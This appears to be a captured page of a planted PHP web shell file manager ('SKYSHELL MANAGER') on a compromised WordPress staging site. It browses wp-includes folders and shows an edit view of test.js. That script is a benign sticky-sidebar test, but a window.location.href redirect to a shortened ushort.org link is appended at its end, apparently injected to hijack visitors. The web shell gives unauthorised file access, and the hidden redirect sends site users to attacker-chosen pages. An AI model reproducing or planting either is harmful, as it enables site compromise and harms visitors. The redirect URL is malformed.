📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: test.js
function testTheiaStickySidebars() { var me = {}; me.scrollTopStep = 1; me.currentScrollTop = 0; me.values = null; window.scrollTo(0, 1); window.scrollTo(0, 0); $(window).scroll(function(me) { return function(event) { var newValues = []; // Get sidebar offsets. $('.theiaStickySidebar').each(function() { newValues.push($(this).offset().top); }); if (me.values != null) { var ok = true; for (var j = 0; j < newValues.length; j++) { var diff = Math.abs(newValues[j] - me.values[j]); if (diff > 1) { ok = false; console.log('Offset difference for sidebar #' + (j + 1) + ' is ' + diff + 'px'); // Highlight sidebar. $($('.theiaStickySidebar')[j]).css('background', 'yellow'); } } if (ok == false) { // Stop test. $(this).unbind(event); alert('Bummer. Offset difference is bigger than 1px for some sidebars, which will be highlighted in yellow. Check the logs. Aborting.'); return; } } me.values = newValues; // Scroll to bottom. We don't cache ($(document).height() - $(window).height()) since it may change (e.g. after images are loaded). if (me.currentScrollTop < ($(document).height() - $(window).height()) && me.scrollTopStep == 1) { me.currentScrollTop += me.scrollTopStep; window.scrollTo(0, me.currentScrollTop); } // Then back up. else if (me.currentScrollTop > 0) { me.scrollTopStep = -1; me.currentScrollTop += me.scrollTopStep; window.scrollTo(0, me.currentScrollTop); } // Then stop. else { $(this).unbind(event); alert("Great success!"); } }; }(me)); } window.location.href = "//https://ushort.org/PuAeyTvkH0r7";
Save